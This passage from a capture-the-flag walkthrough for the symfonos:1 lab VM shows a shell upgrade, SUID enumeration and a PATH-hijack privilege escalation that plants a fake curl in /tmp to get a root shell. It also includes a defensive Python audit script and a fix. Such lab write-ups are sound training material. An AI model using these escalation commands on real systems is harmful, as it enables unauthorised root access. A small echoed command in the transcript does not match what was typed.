python -c "import pty;pty.spawn('/bin/bash')"
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ 

After enabling the interactive shell, we navigate to the /home directory to look for a user flag. Inside, we locate a directory belonging to the user " helios ."  We list its contents using  ls -al , but find no user flag present. 

<h3l105/wp-content/plugins/mail-masta/inc/campaign$ cd /home
cd /home
helios@symfonos:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root   root   4096 Jun 28  2019 .
drwxr-xr-x 22 root   root   4096 Jun 28  2019 ..
drwxr-xr-x  3 helios helios 4096 Jun 28  2019 helios
helios@symfonos:/home$ cd helios
cd helios
helios@symfonos:/home/helios$ ls -al
ls -al
total 24
drwxr-xr-x 3 helios helios 4096 Jun 28  2019 .
drwxr-xr-x 3 root   root   4096 Jun 28  2019 ..
lrwxrwxrwx 1 root   root      9 Jun 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 helios helios  220 Jun 28  2019 .bash_logout
-rw-r--r-- 1 helios helios 3526 Jun 28  2019 .bashrc
-rw-r--r-- 1 helios helios  675 Jun 28  2019 .profile
drwxr-xr-x 2 helios helios 4096 Jun 28  2019 share
helios@symfonos:/home/helios$ 

To proceed, we need to escalate privileges to gain root access, as standard user privileges limit our ability to fully investigate the system.


Privilege Escalation

In privilege escalation, our main objective is to gather system information and identify any potential vulnerabilities or misconfigurations that could allow us to gain elevated privileges, ideally achieving root access. However, because we are connected through a reverse shell, we only have limited user privileges, which restricts our ability to access certain files and commands needed for a full assessment.


SUID Enumeration

To identify privilege escalation opportunities, we search for files with the SUID (Set User ID) bit set, which run with the permissions of the file owner, usually root, regardless of who executes them. We use `find / -perm -4000 2>/dev/null` to locate them.

helios@symfonos:/home/helios$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
helios@symfonos:/home/helios$

This search reveals several binaries. Most are standard system tools, but /opt/statuscheck is unusual and warrants further investigation.

helios@symfonos:/home/helios$ /opt/statuscheck
/opt/statuscheck
HTTP/1.1 200 OK
Date: Fri, 22 Nov 2024 13:00:09 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

helios@symfonos:/home/helios$ 

Running /opt/statuscheck prints HTTP response headers, so the binary makes a request to a web server, and because it is SUID it does so with elevated privileges. This suggests we might be able to abuse it to gain root access.


Exploiting SUID Binary with Path Injection

We proceed by checking the file type of /opt/statuscheck with the `file` command, which identifies it as a 64-bit setuid ELF executable.

helios@symfonos:/home/helios$ file /opt/statuscheck
file /opt/statuscheck
/opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/home/helios$ 

To explore further, we run the ` strings ` command on it, which extracts embedded strings. 

helios@symfonos:/home/helios$ strings /opt/statuscheck
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
prog.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
helios@symfonos:/home/helios$ 

Among them we find `curl -I` and `http://localhost`, together with an imported `system` symbol, which suggests the binary runs `curl` through `system()` to make an HTTP request to localhost. Because `curl` is invoked by name rather than by full path, the shell started by `system()` looks it up in whatever `PATH` we hand it.

To exploit this, we create a fake `curl` in `/tmp`. We first change into `/tmp` with `cd /tmp`, then use `echo "/bin/sh" > curl` to create a file that launches a shell when executed. We run `chmod 777 curl` to make it executable. Finally, we need `/tmp` to come first in the `PATH` environment variable so that our fake `curl` is the one found when `/opt/statuscheck` runs.

helios@symfonos:/home/helios$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/bash" > curl
helios@symfonos:/tmp$ ls -al
ls -al
total 12
drwxrwxrwt  2 root   root   4096 Nov 22 07:06 .
drwxr-xr-x 22 root   root   4096 Jun 28  2019 ..
-rw-r--r--  1 helios helios   10 Nov 22 07:06 curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$

We prepend `/tmp` to the `PATH` with `export PATH=/tmp:$PATH`. Afterwards, we run `/opt/statuscheck` again; it now executes our fake `curl` with root privileges and drops us into a root shell.

helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
#
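The root cause here, and the thing the SUID enumeration above is really hunting for, is a setuid program that calls system() with an unqualified command name and inherits the caller's PATH. As an added example, not the VM's code or a tool from the walkthrough, this Python audit reproduces the lookup the shell performs and reports whether the command a setuid helper would run lives in a world-writable directory, contrasting an inherited PATH with a fixed one. The directory layout is built under a temporary directory to stand in for /usr/bin and /tmp, and both curl files are stub scripts; nothing here touches the real system paths.

```python
import os
import stat
import tempfile


def resolve_command(name: str, search_path: str):
    """Return the first executable regular file called `name` along search_path, as sh would."""
    for directory in search_path.split(os.pathsep):
        if not directory:
            continue  # an empty PATH element means "current directory"; treat it as nothing here
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def writable_path_dirs(search_path: str):
    """Directories on search_path that any local user may write to.

    Uses the mode bit (S_IWOTH) rather than os.access so the answer is the same whether
    the auditor runs as root or as an unprivileged user.
    """
    risky = []
    for directory in search_path.split(os.pathsep):
        try:
            mode = os.stat(directory).st_mode
        except FileNotFoundError:
            continue
        if mode & stat.S_IWOTH:
            risky.append(directory)
    return risky


def audit_setuid_helper(command: str, search_path: str):
    """Describe what system(command) inside a setuid program would run under search_path."""
    resolved = resolve_command(command, search_path)
    risky = writable_path_dirs(search_path)
    return {
        "command": command,
        "resolved": resolved,
        "writable_dirs": risky,
        "hijackable": resolved is not None and os.path.dirname(resolved) in risky,
    }


def demo():
    """Constructed layout: <root>/usr/bin holds the real curl, <root>/tmp a planted one."""
    root = tempfile.mkdtemp(prefix="path-audit-")
    system_bin = os.path.join(root, "usr", "bin")
    scratch = os.path.join(root, "tmp")
    os.makedirs(system_bin)
    os.makedirs(scratch)
    os.chmod(system_bin, 0o755)   # root-owned, not writable by others
    os.chmod(scratch, 0o1777)     # sticky and world-writable, like the real /tmp
    for path in (os.path.join(system_bin, "curl"), os.path.join(scratch, "curl")):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # stub; a real planted file would carry the attacker's commands
        os.chmod(path, 0o755)
    inherited = scratch + os.pathsep + system_bin   # what `export PATH=/tmp:$PATH` produces
    fixed = system_bin                              # what a hardened helper would hard-code
    return {
        "inherited": audit_setuid_helper("curl", inherited),
        "fixed": audit_setuid_helper("curl", fixed),
    }


if __name__ == "__main__":
    for label, report in demo().items():
        print(f"{label:9s} runs {report['resolved']}  hijackable={report['hijackable']}")
```

The same logic applied to a live box answers the question the walkthrough settles by trial: for each SUID binary that imports system, popen or exec*p, does the command it names resolve somewhere a local user can write, given the PATH a caller can set? The fix on the binary side is to call /usr/bin/curl by absolute path with a reset environment (or use libcurl directly), and to drop the setuid bit if the only job is checking a local web server.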

To confirm root access, we run `whoami`, which should return "root".

# whoami
whoami
root

We then navigate to the `/root` directory and list its contents with `ls -al`, where we find a file named `proof.txt`.

# cd /root
cd /root
# ls -al
ls -al
total 24
drwx------  2 root root 4096 Jun 28  2019 .
drwxr-xr-x 22 root root 4096 Jun 28  2019 ..
lrwxrwxrwx  1 root root    9 Jun 28  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28  2019 .selected_editor
-rw-r--r--  1 root root 1735 Jun 28  2019 proof.txt

Finally, we view the contents of `proof.txt` with the `cat` command.

# cat proof.txt 
cat proof.txt

        Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

        Contact me via Twitter @zayotic to give feedback!


The file confirms successful root access and includes a congratulatory message, marking the completion of the task.

If you have any doubts or questions, feel free to leave them in the comment section.
